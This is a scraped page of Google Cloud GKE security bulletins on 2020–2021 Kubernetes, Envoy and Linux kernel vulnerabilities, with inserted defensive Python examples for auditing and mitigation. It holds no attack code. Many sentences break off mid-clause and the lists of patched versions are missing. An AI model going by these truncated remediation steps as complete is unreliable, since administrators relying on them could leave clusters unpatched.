The Envoy and Istio projects recently announced several new security vulnerabilities (CVE-2021-28683, CVE-2021-28682 and CVE-2021-29258) that could allow an attacker to crash Envoy. GKE clusters do not run Istio by default and are not vulnerable. If Istio has been installed in a cluster and configured to expose services to the internet, those services may be vulnerable to denial of service.

What should I do?

To fix these vulnerabilities, upgrade your GKE control plane to one of the following patched versions:

Severity: Medium
GKE clusters on VMware

The Envoy and Istio projects recently announced several new security vulnerabilities (CVE-2021-28683, CVE-2021-28682 and CVE-2021-29258) that could allow an attacker to crash Envoy. GKE on VMware uses Envoy by default for Ingress, so Ingress services may be vulnerable to denial of service.

What should I do?

To fix these vulnerabilities, upgrade your GKE on VMware to one of the following patched versions when released:

Severity: Medium
GKE clusters on Bare Metal

Updated: 2021-05-06

The Envoy and Istio projects recently announced several new security vulnerabilities (CVE-2021-28683, CVE-2021-28682 and CVE-2021-29258) that could allow an attacker to crash Envoy. Google Distributed Cloud Virtual for Bare Metal uses Envoy by default for Ingress, so Ingress services may be vulnerable to denial of service.

What should I do?

To fix these vulnerabilities, upgrade your Google Distributed Cloud Virtual for Bare Metal cluster to one of the following patched versions when released:

Severity: Medium
GCP-2021-003

Published: 2021-04-19
Reference: CVE-2021-25735
GKE

The Kubernetes project recently announced a new security vulnerability, CVE-2021-25735, that could allow node updates to bypass a Validating Admission Webhook. In a scenario where an attacker has sufficient privileges and where a Validating Admission Webhook is implemented that uses old

What should I do?

To fix this vulnerability, upgrade your GKE cluster to one of the following patched versions:

Severity: Medium
GKE clusters on

The Kubernetes project recently announced a new security vulnerability, CVE-2021-25735, that could allow node updates to bypass a Validating Admission Webhook. In a scenario where an attacker has sufficient privileges and where a Validating Admission Webhook is implemented that uses old

What should I do?

An upcoming patch version will include a mitigation for this vulnerability.

Severity: Medium

GKE clusters on

The Kubernetes project recently announced a new security vulnerability, CVE-2021-25735, that could allow node updates to bypass a Validating Admission Webhook. In a scenario where an attacker has sufficient privileges and where a Validating Admission Webhook is implemented that uses old

What should I do?

An upcoming patch version will include a mitigation for this vulnerability.

Severity: Medium

GKE clusters on

The Kubernetes project recently announced a new security vulnerability, CVE-2021-25735, that could allow node updates to bypass a Validating Admission Webhook. In a scenario where an attacker has sufficient privileges and where a Validating Admission Webhook is implemented that uses old

What should I do?

An upcoming patch version will include a mitigation for this vulnerability.

Severity: Medium
GCP-2021-001

Published: 2021-01-28
Reference: CVE-2021-3156
GKE

A vulnerability was recently discovered in the Linux utility

Google Kubernetes Engine (GKE) clusters are not affected by this vulnerability:

What should I do?

Because GKE clusters are not affected by this vulnerability, no further action is required. GKE will have the patch for this vulnerability applied in a coming release at a regular cadence.

Severity: None
GKE clusters on VMware

A vulnerability was recently discovered in the Linux utility

GKE on VMware clusters are not affected by this vulnerability:

What should I do?

Because GKE on VMware clusters are not affected by this vulnerability, no further action is required. GKE on VMware will have the patch for this vulnerability applied in a coming release at a regular cadence.

Severity: None

GKE clusters on AWS

A vulnerability was recently discovered in the Linux utility

GKE on AWS clusters are not affected by this vulnerability:

What should I do?

Because GKE on AWS clusters are not affected by this vulnerability, no further action is required. GKE on AWS will have the patch for this vulnerability applied in a coming release at a regular cadence.

Severity: None

GKE clusters on Bare Metal

A vulnerability was recently discovered in the Linux utility

Google Distributed Cloud Virtual for Bare Metal clusters are not affected by this vulnerability:

What should I do?

Because Google Distributed Cloud Virtual for Bare Metal clusters are not affected by this vulnerability, no further action is required. Google Distributed Cloud Virtual for Bare Metal will have the patch for this vulnerability applied in a coming release at a regular cadence.

Severity: None
GCP-2020-015

Published: 2020-12-07
Updated: 2021-12-22
Reference: CVE-2020-8554

2021-12-22 update: Uses gcloud beta instead of the gcloud command.
2021-12-15 update: Added an additional mitigation for GKE.
GKE

Updated 2021-12-22: The command for GKE in the following section should use gcloud beta instead of the gcloud command:

```shell
gcloud beta container clusters update --no-enable-service-externalips
```

Updated 2021-12-15: For GKE, the following mitigation is now available:

For more information, see Hardening your cluster's security.

The Kubernetes project recently discovered a new security vulnerability, CVE-2020-8554, that might allow an attacker who has obtained permissions to create a Kubernetes Service of type LoadBalancer or ClusterIP to intercept network traffic originating from other Pods in the cluster. This vulnerability by itself does not give an attacker permissions to create a Kubernetes Service. All Google Kubernetes Engine (GKE) clusters are affected by this vulnerability.

What should I do?

Kubernetes might need to make backwards-incompatible design changes in a future version to address the vulnerability. If many users share access to your cluster with permissions to create Services, such as in a multi-tenant cluster, consider applying a mitigation in the meantime. For now, the best approach for mitigation is to restrict the use of ExternalIPs in a cluster. ExternalIPs are not a commonly used feature. Restrict the use of ExternalIPs in a cluster with one of the following methods:

As mentioned in the Kubernetes announcement, no mitigation is provided for Services of type LoadBalancer because, by default, only highly privileged users and system components are granted the

Severity: Medium
GKE clusters on VMware

Updated 2021-12-22: The command for GKE in the following section should use gcloud beta instead of the gcloud command:

```shell
gcloud beta container clusters update --no-enable-service-externalips
```

Updated 2021-12-15: For GKE, the following mitigation is now available:

For more information, see Hardening your cluster's security.

The Kubernetes project recently discovered a new security vulnerability, CVE-2020-8554, that might allow an attacker who has obtained permissions to create a Kubernetes Service of type LoadBalancer or ClusterIP to intercept network traffic originating from other Pods in the cluster. This vulnerability by itself does not give an attacker permissions to create a Kubernetes Service. All GKE on VMware clusters are affected by this vulnerability.

What should I do?

Kubernetes might need to make backwards-incompatible design changes in a future version to address the vulnerability. If many users share access to your cluster with permissions to create Services, such as in a multi-tenant cluster, consider applying a mitigation in the meantime. For now, the best approach for mitigation is to restrict the use of ExternalIPs in a cluster. ExternalIPs are not a commonly used feature. Restrict the use of ExternalIPs in a cluster with one of the following methods:

As mentioned in the Kubernetes announcement, no mitigation is provided for Services of type LoadBalancer because, by default, only highly privileged users and system components are granted the

Severity: Medium
GKE clusters on AWS

Updated 2021-12-22: The command for GKE in the following section should use gcloud beta instead of the gcloud command:

```shell
gcloud beta container clusters update --no-enable-service-externalips
```

Updated 2021-12-15: For GKE, the following mitigation is now available:

For more information, see Hardening your cluster's security.

The Kubernetes project recently discovered a new security vulnerability, CVE-2020-8554, that might allow an attacker who has obtained permissions to create a Kubernetes Service of type LoadBalancer or ClusterIP to intercept network traffic originating from other Pods in the cluster. This vulnerability by itself does not give an attacker permissions to create a Kubernetes Service. All GKE on AWS clusters are affected by this vulnerability.

What should I do?

Kubernetes might need to make backwards-incompatible design changes in a future version to address the vulnerability. If many users share access to your cluster with permissions to create Services, such as in a multi-tenant cluster, consider applying a mitigation in the meantime. For now, the best approach for mitigation is to restrict the use of ExternalIPs in a cluster. ExternalIPs are not a commonly used feature. Restrict the use of ExternalIPs in a cluster with one of the following methods:

As mentioned in the Kubernetes announcement, no mitigation is provided for Services of type LoadBalancer because, by default, only highly privileged users and system components are granted the

Severity: Medium
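The GCP-2020-015 bulletin above, for each platform, says to restrict the use of ExternalIPs but the list of methods is not on the page. One way to do that, on any of these platforms, is a validating admission webhook that refuses Services whose `spec.externalIPs` is set, optionally allowing a known list. The following is an added example, not Google's or the Kubernetes project's code: the decision logic of such a webhook, written as a function from an `AdmissionReview` request to an `AdmissionReview` response. The `AdmissionReview` payloads are constructed for the example and `ALLOWED_EXTERNAL_IPS` is an assumed allowlist (empty it to forbid every externalIP).

```python
"""Validating-admission decision for Services using externalIPs (added example).

Not Google's or the Kubernetes project's code. The function below is the
decision logic an admission webhook would run on each Service CREATE or
UPDATE: reject the object if spec.externalIPs lists an address outside a
small, reviewed allowlist. The AdmissionReview payloads are constructed here.
"""
import json
from typing import Any

# Assumed allowlist of externalIPs the cluster legitimately uses
# (203.0.113.0/24 is a documentation range). Leave empty to forbid all.
ALLOWED_EXTERNAL_IPS: set[str] = {"203.0.113.10"}


def validate_service(service: dict[str, Any]) -> tuple[bool, str]:
    """Allow the Service unless it sets externalIPs outside the allowlist."""
    ips = service.get("spec", {}).get("externalIPs") or []
    rejected = [ip for ip in ips if ip not in ALLOWED_EXTERNAL_IPS]
    if rejected:
        return False, f"spec.externalIPs {rejected} not permitted (CVE-2020-8554 mitigation)"
    return True, ""


def handle_admission_review(review: dict[str, Any]) -> dict[str, Any]:
    """Build the AdmissionReview response for an incoming request.

    Only Service objects are inspected; any other kind is allowed through so a
    mis-scoped webhook configuration cannot block unrelated objects.
    """
    request = review["request"]
    allowed, message = True, ""
    if request.get("kind", {}).get("kind") == "Service":
        allowed, message = validate_service(request.get("object") or {})
    response: dict[str, Any] = {"uid": request["uid"], "allowed": allowed}
    if not allowed:
        response["status"] = {"code": 403, "message": message}
    return {
        "apiVersion": review.get("apiVersion", "admission.k8s.io/v1"),
        "kind": "AdmissionReview",
        "response": response,
    }


def make_review(name: str, external_ips: list[str], uid: str = "req-1") -> dict[str, Any]:
    """Construct a minimal AdmissionReview request for a ClusterIP Service (sample input)."""
    spec: dict[str, Any] = {"type": "ClusterIP", "ports": [{"port": 80}]}
    if external_ips:
        spec["externalIPs"] = external_ips
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "request": {
            "uid": uid,
            "kind": {"group": "", "version": "v1", "kind": "Service"},
            "operation": "CREATE",
            "object": {
                "apiVersion": "v1",
                "kind": "Service",
                "metadata": {"name": name, "namespace": "tenant-b"},
                "spec": spec,
            },
        },
    }


if __name__ == "__main__":
    samples = [("plain", []), ("external", ["198.51.100.5"]), ("known", ["203.0.113.10"])]
    for name, ips in samples:
        print(name, json.dumps(handle_admission_review(make_review(name, ips))["response"]))
```

The webhook must be registered for UPDATE as well as CREATE, since an existing Service can be patched to add `externalIPs`; that is why `handle_admission_review` only looks at `request.object` and ignores `oldObject`. The bulletin's note about LoadBalancer Services still applies: this check does nothing for them, by design.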
GCP-2020-014

Published: 2020-10-20
Reference: CVE-2020-8563, CVE-2020-8564, CVE-2020-8565, CVE-2020-8566
GKE

Updated: 2020-10-20

The Kubernetes project recently discovered several issues that allow for the exposure of secret data when verbose logging options are enabled. The issues are:

GKE is not affected.

What should I do?

No further action is required due to the default verbosity logging levels of GKE.

Severity: None
GKE clusters on VMware

Updated: 2020-10-10

The Kubernetes project recently discovered several issues that allow for the exposure of secret data when verbose logging options are enabled. The issues are:

GKE on VMware is not affected.

What should I do?

No further action is required due to the default verbosity logging levels of GKE.

Severity: None

GKE clusters on AWS

Updated: 2020-10-20

The Kubernetes project recently discovered several issues that allow for the exposure of secret data when verbose logging options are enabled. The issues are:

GKE on AWS is not affected.

What should I do?

No further action is required due to the default verbosity logging levels of GKE.

Severity: None
GCP-2020-012

Published: 2020-09-14
Reference: CVE-2020-14386
GKE

A vulnerability was recently discovered in the Linux kernel, described in CVE-2020-14386, that may allow container escape to obtain root privileges on the host node. All GKE nodes are affected. Pods running in GKE Sandbox are not able to leverage this vulnerability.

What should I do?

To fix this vulnerability, upgrade your control plane, and then your nodes, to one of the patched versions listed below:

Exploiting this vulnerability requires

Drop the

What vulnerability is addressed by this patch?

The patch mitigates the following vulnerability: CVE-2020-14386, which allows containers with

Severity: High
GKE clusters on VMware

Updated: 2020-09-17

A vulnerability was recently discovered in the Linux kernel, described in CVE-2020-14386, that may allow container escape to obtain root privileges on the host node. All GKE on VMware nodes are affected.

What should I do?

To fix this vulnerability, upgrade your cluster to a patched version. The following upcoming GKE on VMware versions will contain the fix for this vulnerability, and this bulletin will be updated when they are available:

Exploiting this vulnerability requires

Drop the

What vulnerability is addressed by this patch?

The patch mitigates the following vulnerability: CVE-2020-14386, which allows containers with

Severity: High
GKE clusters on AWS

Updated: 2020-10-13

A vulnerability was recently discovered in the Linux kernel, described in CVE-2020-14386, that may allow container escape to obtain root privileges on the host node. All GKE on AWS nodes are affected.

What should I do?

To fix this vulnerability, upgrade your management service and your user clusters to a patched version. The following upcoming GKE on AWS versions or newer will include the fix for this vulnerability, and this bulletin will be updated when they are available:

Drop the

What vulnerability is addressed by this patch?

The patch mitigates the following vulnerability: CVE-2020-14386, which allows containers with

Severity: High
GCP-2020-011

Published: 2020-07-24
Reference: CVE-2020-8558
GKE

A networking vulnerability, CVE-2020-8558, was recently discovered in Kubernetes. Services sometimes communicate with other applications running inside the same Pod using the local loopback interface (127.0.0.1). This vulnerability allows an attacker with access to the cluster's network to send traffic to the loopback interface of adjacent Pods and nodes. Services that rely on the loopback interface not being accessible outside their Pod could be exploited. Exploiting this vulnerability on GKE clusters requires an attacker to have network administrator privileges on the Google Cloud hosting the cluster's VPC. This vulnerability alone does not give an attacker network administrator privileges. For this reason, this vulnerability has been assigned a Low severity for GKE.

What should I do?

To fix this vulnerability, upgrade your cluster's node pools to the following GKE versions (and later):

What vulnerability is addressed by this patch?

This patch fixes the following vulnerability: CVE-2020-8558.

Severity: Low
GKE clusters on VMware

A networking vulnerability, CVE-2020-8558, was recently discovered in Kubernetes. Services sometimes communicate with other applications running inside the same Pod using the local loopback interface (127.0.0.1). This vulnerability allows an attacker with access to the cluster's network to send traffic to the loopback interface of adjacent Pods and nodes. Services that rely on the loopback interface not being accessible outside their Pod could be exploited.

What should I do?

To fix this vulnerability, upgrade your cluster to a patched version. The following upcoming GKE on VMware versions or newer contain the fix for this vulnerability:

What vulnerability is addressed by this patch?

This patch fixes the following vulnerability: CVE-2020-8558.

Severity: Medium

GKE clusters on AWS

A networking vulnerability, CVE-2020-8558, was recently discovered in Kubernetes. Services sometimes communicate with other applications running inside the same Pod using the local loopback interface (127.0.0.1). This vulnerability allows an attacker with access to the cluster's network to send traffic to the loopback interface of adjacent Pods and nodes. Services that rely on the loopback interface not being accessible outside their Pod could be exploited. Exploiting this vulnerability on user clusters requires an attacker to disable source/destination checks on the EC2 instances in the cluster. This requires the attacker to have AWS IAM permissions for

What should I do?

To fix this vulnerability, upgrade your cluster to a patched version. The following upcoming GKE on AWS versions or newer are expected to include the fix for this vulnerability:

What vulnerability is addressed by this patch?

This patch fixes the following vulnerability: CVE-2020-8558.

Severity: Low
GCP-2020-009

Published: 2020-07-15
Reference: CVE-2020-8559
GKE

A privilege escalation vulnerability, CVE-2020-8559, was recently discovered in Kubernetes. This vulnerability allows an attacker that has already compromised a node to execute a command in any Pod in the cluster. The attacker can thereby use the already compromised node to compromise other nodes and potentially read information, or cause destructive actions. Note that for an attacker to exploit this vulnerability, a node in your cluster must have already been compromised. This vulnerability, by itself, will not compromise any nodes in your cluster.

What should I do?

Upgrade your cluster to a patched version. Clusters will be auto-upgraded over the next weeks, and patched versions will be available by July 19, 2020 for an accelerated manual upgrade schedule. The following GKE control plane versions or newer contain the fix for this vulnerability:

What vulnerability is addressed by this patch?

These patches mitigate vulnerability CVE-2020-8559. This is rated as a Medium vulnerability for GKE, as it requires the attacker to have first-hand information about the cluster, nodes, and workloads to effectively leverage this attack, in addition to an existing compromised node. This vulnerability by itself will not provide an attacker with a compromised node.

Severity: Medium
GKE clusters on
Description | Severity |
---|---|
A privilege escalation vulnerability, CVE-2020-8559, was recently discovered in Kubernetes. This vulnerability allows an attacker who has already compromised a node to execute a command in any Pod in the cluster. The attacker can thereby use the already compromised node to compromise other nodes and potentially read information or cause destructive actions. Note that for an attacker to exploit this vulnerability, a node in your cluster must already have been compromised; this vulnerability, by itself, will not compromise any nodes in your cluster.
What should I do?
Upgrade your cluster to a patched version. The following upcoming GKE on VMware versions or newer contain the fix for this vulnerability:
What vulnerability is addressed by this patch?
These patches mitigate CVE-2020-8559. It is rated as a Medium vulnerability for GKE because, in addition to an already compromised node, the attacker needs first-hand information about the cluster, nodes, and workloads to leverage the attack effectively. This vulnerability by itself will not provide an attacker with a compromised node. |
Medium |
GKE on AWS
Description | Severity |
---|---|
A privilege escalation vulnerability, CVE-2020-8559, was recently discovered in Kubernetes. This vulnerability allows an attacker who has already compromised a node to execute a command in any Pod in the cluster. The attacker can thereby use the already compromised node to compromise other nodes and potentially read information or cause destructive actions. Note that for an attacker to exploit this vulnerability, a node in your cluster must already have been compromised; this vulnerability, by itself, will not compromise any nodes in your cluster.
What should I do?
GKE on AWS GA (1.4.1, available end of July, 2020) or newer includes the patch for this vulnerability. If you are using a previous version, download a new version of the anthos-gke command line tool and recreate your management and user clusters.
What vulnerability is addressed by this patch?
These patches mitigate CVE-2020-8559. It is rated as a Medium vulnerability for GKE because, in addition to an already compromised node, the attacker needs first-hand information about the cluster, nodes, and workloads to leverage the attack effectively. This vulnerability by itself will not provide an attacker with a compromised node. |
Medium |
GCP-2020-007
Published: 2020-06-01Reference: CVE-2020-8555
GKE
Description | Severity |
---|---|
A Server-Side Request Forgery (SSRF) vulnerability, CVE-2020-8555, was recently discovered in Kubernetes. It allows certain authorized users to leak up to 500 bytes of sensitive information from the control plane host network. The Google Kubernetes Engine (GKE) control plane uses controllers from Kubernetes and is thus affected by this vulnerability. We recommend that you upgrade the control plane to the latest patch version, as detailed below. A node upgrade is not required.
What should I do?
For most customers, no further action is required. The vast majority of clusters are already running a patched version. The following GKE versions or newer contain the fix for this vulnerability:
Clusters using release channels are already on control plane versions with the mitigation.
What vulnerability is addressed by this patch?
These patches mitigate CVE-2020-8555. It is rated as a Medium vulnerability for GKE because it is difficult to exploit due to various control plane hardening measures. An attacker with permissions to create a Pod with certain built-in Volume types (GlusterFS, Quobyte, StorageOS, ScaleIO) or permissions to create a StorageClass can cause
Combined with a means to leak the results of the |
Medium |
GKE on VMware
Description | Severity |
---|---|
A Server-Side Request Forgery (SSRF) vulnerability, CVE-2020-8555, was recently discovered in Kubernetes. It allows certain authorized users to leak up to 500 bytes of sensitive information from the control plane host network. The Google Kubernetes Engine (GKE) control plane uses controllers from Kubernetes and is thus affected by this vulnerability. We recommend that you upgrade the control plane to the latest patch version, as detailed below. A node upgrade is not required.
What should I do?
The following GKE on VMware versions or newer contain the fix for this vulnerability:
If you are using a previous version, upgrade your existing cluster to a version containing the fix.
What vulnerability is addressed by this patch?
These patches mitigate CVE-2020-8555. It is rated as a Medium vulnerability for GKE because it is difficult to exploit due to various control plane hardening measures. An attacker with permissions to create a Pod with certain built-in Volume types (GlusterFS, Quobyte, StorageOS, ScaleIO) or permissions to create a StorageClass can cause
Combined with a means to leak the results of the |
Medium |
GKE on AWS
Description | Severity |
---|---|
A Server-Side Request Forgery (SSRF) vulnerability, CVE-2020-8555, was recently discovered in Kubernetes. It allows certain authorized users to leak up to 500 bytes of sensitive information from the control plane host network. The Google Kubernetes Engine (GKE) control plane uses controllers from Kubernetes and is thus affected by this vulnerability. We recommend that you upgrade the control plane to the latest patch version, as detailed below. A node upgrade is not required.
What should I do?
GKE on AWS v0.2.0 or newer already includes the patch for this vulnerability. If you are using a previous version, download a new version of the anthos-gke command line tool and recreate your management and user clusters.
What vulnerability is addressed by this patch?
These patches mitigate CVE-2020-8555. It is rated as a Medium vulnerability for GKE because it is difficult to exploit due to various control plane hardening measures. An attacker with permissions to create a Pod with certain built-in Volume types (GlusterFS, Quobyte, StorageOS, ScaleIO) or permissions to create a StorageClass can cause
Combined with a means to leak the results of the |
Medium |
GCP-2020-006
Published: 2020-06-01Reference: Kubernetes issue 91507
GKE
Description | Severity |
---|---|
Kubernetes has disclosed a vulnerability that allows a privileged container to redirect node traffic to another container. Mutual TLS/SSH traffic, such as traffic between the kubelet and the API server or from applications using mTLS, cannot be read or modified by this attack. All Google Kubernetes Engine (GKE) nodes are affected by this vulnerability, and we recommend that you upgrade to the latest patch version, as detailed below.
What should I do?
To mitigate this vulnerability, upgrade your control plane, and then your nodes, to one of the patched versions listed below. Clusters on release channels are already running a patched version on both control plane and nodes:
Very few containers typically require Drop the
What vulnerability is addressed by this patch?
The patch mitigates the vulnerability described in Kubernetes issue 91507. |
Medium |
GKE on VMware
Description | Severity |
---|---|
Kubernetes has disclosed a vulnerability that allows a privileged container to redirect node traffic to another container. Mutual TLS/SSH traffic, such as traffic between the kubelet and the API server or from applications using mTLS, cannot be read or modified by this attack. All Google Kubernetes Engine (GKE) nodes are affected by this vulnerability, and we recommend that you upgrade to the latest patch version, as detailed below.
What should I do?
To mitigate this vulnerability for GKE on VMware, upgrade your clusters to the following version or newer:
Very few containers typically require Drop the
What vulnerability is addressed by this patch?
The patch mitigates the vulnerability described in Kubernetes issue 91507. |
Medium |
GKE on AWS
Description | Severity |
---|---|
Kubernetes has disclosed a vulnerability that allows a privileged container to redirect node traffic to another container. Mutual TLS/SSH traffic, such as traffic between the kubelet and the API server or from applications using mTLS, cannot be read or modified by this attack. All Google Kubernetes Engine (GKE) nodes are affected by this vulnerability, and we recommend that you upgrade to the latest patch version, as detailed below.
What should I do?
Download the anthos-gke command line tool with the following version or newer and recreate your management and user clusters:
Very few containers typically require Drop the
What vulnerability is addressed by this patch?
The patch mitigates the vulnerability described in Kubernetes issue 91507. |
Medium |
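The two bulletins above (GCP-2020-007 and GCP-2020-006) both hinge on what a workload is allowed to request: the CVE-2020-8555 entries name the built-in volume types and the StorageClass-create permission an attacker needs, and the issue 91507 entries describe an attack available only to privileged containers. The following audit is an added example, not Google's or the Kubernetes project's code. It walks the JSON that `kubectl get pod -o json` and `kubectl get clusterroles -o json` produce and flags privileged containers, volumes using the named plugins, and roles whose RBAC rules (including `*` wildcards) grant `create` on `storageclasses`. The sample Pod and roles are constructed for the example; the function names are this example's own.

```python
"""Audit Pods and RBAC roles for the conditions named in GCP-2020-007 (CVE-2020-8555)
and GCP-2020-006 (Kubernetes issue 91507). Added example, not Google's code."""
import json

# Volume plugins named in the CVE-2020-8555 bulletin, keyed by the field name
# each one uses in a Pod's .spec.volumes[] entry (ScaleIO's field is "scaleIO").
SSRF_VOLUME_TYPES = {"glusterfs", "quobyte", "storageos", "scaleIO"}


def privileged_containers(pod: dict) -> list[str]:
    """Names of init and regular containers that run with securityContext.privileged: true."""
    spec = pod.get("spec", {})
    return [c["name"]
            for c in spec.get("initContainers", []) + spec.get("containers", [])
            if c.get("securityContext", {}).get("privileged") is True]


def ssrf_volumes(pod: dict) -> list[tuple[str, str]]:
    """(volume name, plugin field) for every volume that uses a CVE-2020-8555 plugin."""
    return [(vol["name"], key)
            for vol in pod.get("spec", {}).get("volumes", [])
            for key in vol if key in SSRF_VOLUME_TYPES]


def rule_grants(rule: dict, api_group: str, resource: str, verb: str) -> bool:
    """True if one RBAC PolicyRule allows verb on resource in api_group.

    Matches the '*' wildcard the way the RBAC authorizer does for apiGroups,
    resources and verbs; resourceNames and nonResourceURLs are ignored here."""
    def match(allowed: list[str], wanted: str) -> bool:
        return "*" in allowed or wanted in allowed
    return (match(rule.get("apiGroups", []), api_group)
            and match(rule.get("resources", []), resource)
            and match(rule.get("verbs", []), verb))


def roles_granting(roles: list[dict], api_group: str, resource: str, verb: str) -> list[str]:
    """Names of Roles/ClusterRoles with at least one rule granting the permission."""
    return [r["metadata"]["name"] for r in roles
            if any(rule_grants(rule, api_group, resource, verb) for rule in r.get("rules", []))]


# Constructed sample objects standing in for kubectl JSON output; not from a real cluster.
SAMPLE_POD = json.loads("""
{"kind": "Pod", "metadata": {"name": "netdebug"},
 "spec": {"initContainers": [{"name": "setup", "image": "busybox"}],
          "containers": [{"name": "sniffer", "image": "tcpdump",
                          "securityContext": {"privileged": true}},
                         {"name": "app", "image": "nginx",
                          "securityContext": {"privileged": false}}],
          "volumes": [{"name": "data", "glusterfs": {"endpoints": "glusterfs-cluster", "path": "kube_vol"}},
                      {"name": "tmp", "emptyDir": {}}]}}
""")

SAMPLE_ROLES = [
    {"metadata": {"name": "storage-admin"},
     "rules": [{"apiGroups": ["storage.k8s.io"], "resources": ["storageclasses"],
                "verbs": ["create", "delete"]}]},
    {"metadata": {"name": "cluster-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"metadata": {"name": "view"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
]

if __name__ == "__main__":
    print("privileged containers:", privileged_containers(SAMPLE_POD))
    print("CVE-2020-8555 volume types in use:", ssrf_volumes(SAMPLE_POD))
    print("roles that can create StorageClasses:",
          roles_granting(SAMPLE_ROLES, "storage.k8s.io", "storageclasses", "create"))
```

On a real cluster, feed the output of `kubectl get pods --all-namespaces -o json` (iterate over `items`) and `kubectl get clusterroles,roles --all-namespaces -o json`; any role the audit lists should be bound only to subjects you trust with control-plane-adjacent requests until the control plane is on a patched version.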
GCP-2020-005
Published: 2020-05-07Updated: 2020-05-07
Reference: CVE-2020-8835
GKE
Description | Severity |
---|---|
A vulnerability was recently discovered in the Linux kernel, described in CVE-2020-8835, that allows a container escape to obtain root privileges on the host node. Google Kubernetes Engine (GKE) Ubuntu nodes running GKE 1.16 or 1.17 are affected by this vulnerability, and we recommend that you upgrade to the latest patch version as soon as possible, as detailed below. Nodes running Container-Optimized OS are not affected. Nodes running on GKE on VMware are not affected.
What should I do?
For most customers, no further action is required. Only nodes running Ubuntu in GKE version 1.16 or 1.17 are affected. In order to upgrade your nodes, you must first upgrade your master to the newest version. This patch will be available in GKE versions 1.16.8-gke.12, 1.17.4-gke.10, and newer releases. Track the availability of these patches in the release notes.
What vulnerability is addressed by this patch?
The patch mitigates the following vulnerability: CVE-2020-8835 describes a vulnerability in the Linux kernel version 5.5.0 and newer that allows a malicious container to (with minimal user interaction in the form of an exec) read and write kernel memory and thus gain root-level code execution on the host node. This is rated as a 'High' severity vulnerability. |
High |
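The bulletin above gives enough to check a cluster mechanically: only Ubuntu nodes are affected, only on the 1.16 and 1.17 lines, and the first patched versions are 1.16.8-gke.12 and 1.17.4-gke.10. The following is an added example, not Google's code, that reads the JSON from `kubectl get nodes -o json`, parses the `-gke.N` version suffix so that the comparison orders by GKE patch number rather than as a string, and returns the nodes that still need the node pool upgrade. The node list below is constructed for the example; `parse_gke_version`, `is_affected` and `affected_nodes` are this example's own names.

```python
"""Find GKE nodes still affected by CVE-2020-8835 (GCP-2020-005) from
`kubectl get nodes -o json`. Added example, not Google's code."""
import re

# First patched GKE version for each affected minor line, as stated in the bulletin.
FIXED_VERSIONS = {(1, 16): "1.16.8-gke.12", (1, 17): "1.17.4-gke.10"}

# kubeletVersion on a GKE node looks like "v1.16.8-gke.12".
_GKE_VERSION = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)-gke\.(\d+)$")


def parse_gke_version(version: str) -> tuple[int, ...]:
    """'v1.16.8-gke.12' -> (1, 16, 8, 12). Raises ValueError for non-GKE strings,
    so a node with an unexpected version is reported rather than silently skipped."""
    m = _GKE_VERSION.match(version)
    if not m:
        raise ValueError(f"not a GKE version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(kubelet_version: str, os_image: str) -> bool:
    """True when the node runs Ubuntu on a 1.16/1.17 GKE version older than the fix."""
    if "ubuntu" not in os_image.lower():
        return False            # Container-Optimized OS nodes are not affected
    v = parse_gke_version(kubelet_version)
    fixed = FIXED_VERSIONS.get(v[:2])
    if fixed is None:
        return False            # the bulletin calls out only 1.16 and 1.17
    return v < parse_gke_version(fixed)   # tuple compare: patch, then gke number


def affected_nodes(node_list: dict) -> list[str]:
    """Names of affected nodes in a NodeList document."""
    out = []
    for node in node_list.get("items", []):
        info = node["status"]["nodeInfo"]
        if is_affected(info["kubeletVersion"], info["osImage"]):
            out.append(node["metadata"]["name"])
    return out


def _node(name: str, kubelet: str, os_image: str) -> dict:
    return {"metadata": {"name": name},
            "status": {"nodeInfo": {"kubeletVersion": kubelet, "osImage": os_image}}}


# Constructed NodeList standing in for `kubectl get nodes -o json`; not a real cluster.
SAMPLE_NODES = {"kind": "NodeList", "items": [
    _node("node-a", "v1.16.8-gke.9", "Ubuntu 18.04.4 LTS"),                   # unpatched
    _node("node-b", "v1.16.8-gke.15", "Ubuntu 18.04.4 LTS"),                  # patched
    _node("node-c", "v1.17.4-gke.6", "Container-Optimized OS from Google"),   # COS: not affected
    _node("node-d", "v1.17.3-gke.5", "Ubuntu 18.04.4 LTS"),                   # unpatched
    _node("node-e", "v1.15.11-gke.9", "Ubuntu 18.04.4 LTS"),                  # 1.15: not called out
]}

if __name__ == "__main__":
    print("nodes needing upgrade:", affected_nodes(SAMPLE_NODES))
```

The same shape works for any bulletin that gives first-fixed versions per minor line: change `FIXED_VERSIONS` and the OS filter. Note the ordering pitfall the parser avoids: as strings, "1.16.8-gke.9" sorts after "1.16.8-gke.12", which would mark an unpatched node as fixed.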
GCP-2020-004
Published: 2020-05-07Updated: 2020-05-07
Reference: CVE-2019-11254
GKE clusters on
Description | Severity |
---|---|
A vulnerability was recently discovered in Kubernetes, described in CVE-2019-11254, which allows any user authorized to make POST requests to execute a remote Denial-of-Service attack on a Kubernetes API server. The Kubernetes Product Security Committee (PSC) released additional information on this vulnerability, which can be found here. You can mitigate this vulnerability by limiting which clients have network access to your Kubernetes API servers.
What should I do?
We recommend that you upgrade your clusters to patch versions containing the fix for this vulnerability as soon as they are available. The patch versions that contain the fix are listed below:
What vulnerabilities are addressed by this patch?
The patch fixes the following Denial-of-Service (DoS) vulnerability: |
Medium |
GCP-2020-003
Published: 2020-03-31Updated: 2020-03-31
Reference: CVE-2019-11254
GKE
Description | Severity |
---|---|
A vulnerability was recently discovered in Kubernetes, described in CVE-2019-11254, which allows any user authorized to make POST requests to execute a remote Denial-of-Service attack on a Kubernetes API server. The Kubernetes Product Security Committee (PSC) released additional information on this vulnerability, which can be found here. GKE clusters that use Master Authorized Networks, and private clusters with no public endpoint, mitigate this vulnerability.
What should I do?
We recommend that you upgrade your cluster to a patch version containing the fix for this vulnerability. The patch versions that contain the fix are listed below:
What vulnerabilities are addressed by this patch?
The patch fixes the following Denial-of-Service (DoS) vulnerability: |
Medium |
